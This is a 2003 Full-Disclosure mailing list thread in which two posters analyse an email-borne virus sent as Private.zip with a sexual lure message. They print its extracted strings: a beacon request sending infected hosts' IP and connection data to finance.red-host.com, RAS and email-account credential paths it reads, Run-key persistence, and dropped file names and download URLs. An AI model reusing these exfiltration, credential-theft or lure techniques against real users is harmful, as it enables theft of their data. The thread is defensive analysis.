Re: New virus

["Lorenzo Hernandez Garcia-Hierro" <lorenzohgh () nsrg-security com>]

Hi,
Look this line:
GET /events.php?%s HTTP/1.1
Accept: */*
Connection: Keep-Alive
Host: finance.red-host.com
id=%s&ip=%s&speed=%d&timeonline=%d
finance.red-host.com
so imagine this:
id=[autonumeric ]&ip=[internet address by gestaddrbyhost]&speed=[connection
speed]&timeonline=[seconds/minutes]

this logs the information about an infected host.
look more:
/* Written By Adrey Karimov [www.proantivirus.com] */
This can be a bogus data but , that boy is from an antivirus related company
! :) ( who are the virii authors now ? )

%s0x%02hx%02hx%02hx%02hx%02hx%02hx
S-%lu-
%s SC:%s
%s SW:%i.%i.%i.%i
%s PW:%i.%i.%i.%i
%s SD:%i.%i.%i.%i
%s PD:%i.%i.%i.%i
%s IP:%i.%i.%i.%i
%s%s:%s:%s [%s]
DialParamsUID
%sMicrosoft\Network\Connections\pbk\rasphone.pbk
%s\
LdapUnicodeToUTF8

Thsi calls the api of microsoft ras and insert the data into  a new
telefonic connection.

This functions are called , so the virus uses the memeroy stack:
strcat
strchr <-*
strcmp
strlen
strncat
strncpy <- *
strstr < - *

And it creates a file with the first data :

c:\temp35.txt

It keeps there the data found at SOFTWARE\Microsoft\Internet Account
Manager\Accounts

Other things that the virus do:
Software\Microsoft\Windows\CurrentVersion\Run
\sysdeb32.exe
31337
c:\tmp.exe
Creates a regkey to run it at startup and it copies to some locations.

stores this data ?¿? :
%-2.2X
%.8x%.8x
\svc.sav

I thin k some info is hardcoded .
The presence of sysdeb32.exe and tmp.exe indicates virus activity.

i don't know which virus is this.
xD

Best regards ,
-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->\x74\x72\x75\x6c\x75\x78
0x02->The truth is out there,
0x03-> outside your mind .
__________________________________
PGP: Keyfingerprint
4ACC D892 05F9 74F1 F453  7D62 6B4E B53E 9180 5F5B
ID: 0x91805F5B
**********************************
\x6e\x73\x72\x67
\x73\x65\x63\x75\x72\x69\x74\x79
\x72\x65\x73\x65\x61\x72\x63\x68
http://www.nsrg-security.com
______________________
----- Original Message ----- 
From: "Andrew Thomas" <andrewt () nmh co za>
To: "'Full Disclosure'" <full-disclosure () lists netsys com>
Sent: Tuesday, November 25, 2003 9:02 AM
Subject: [Full-disclosure] New virus


> Hi,
>
> Just to confirm receipt of another email containing the following
> text:
> --snip--
> Hello my dear Mary,
>
> I have been thinking about you all night. I would like to apologize
> for the other night when we made beautiful love and did not use
> condoms. I know this was a mistake and I beg you to forgive me.
>
> I miss you more than anything, please call me Mary, I need you. Do
> you remember when we were having wild sex in my house? I remember
> it all like it was only yesterday. You said that the pictures
> would not come out good, but you were very wrong, they are great.
> I didn't want to show you the pictures at first, but now I think
> it's time for you to see them. Please look in the attachment and
> you will see what I mean.
>
> I love you with all my heart, James.
> --snip--
>
> With attached Private.zip.
>
> A quick strings (after unpacking) on the file gives
> http://afx.alink.co.za/rt.txt
>
> The original archive is available @ http://afx.alink.co.za/Private.zip
>
> I don't have the time to take this apart, but some interesting things
> include a call to function "UrlDownloadToFileA", and a bunch of other
> HTTP-style requests.
>
> Also looks like it may do some kind of speed test and post results
> as well remotely, including IP address of the infected host, as well
> as pulling stuff out like RAS info, pop3 info, etc.
>
> The host that appears to be called is "finance.red-host.com", with a
> call made to the page "showinfo.php", which returns only
> --snip--
> Error 0x7a2e: Invalid query, database search failed.
> --snip--
> without anything appended.
>
> There's quite a bit more in here.
>
>   A.
> -- 
> Andrew G. Thomas
> Hobbs & Associates Chartered Accountants (SA)
> (o) +27-(0)21-683-0500
> (f) +27-(0)21-683-0577
> (m) +27-(0)83-318-4070
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html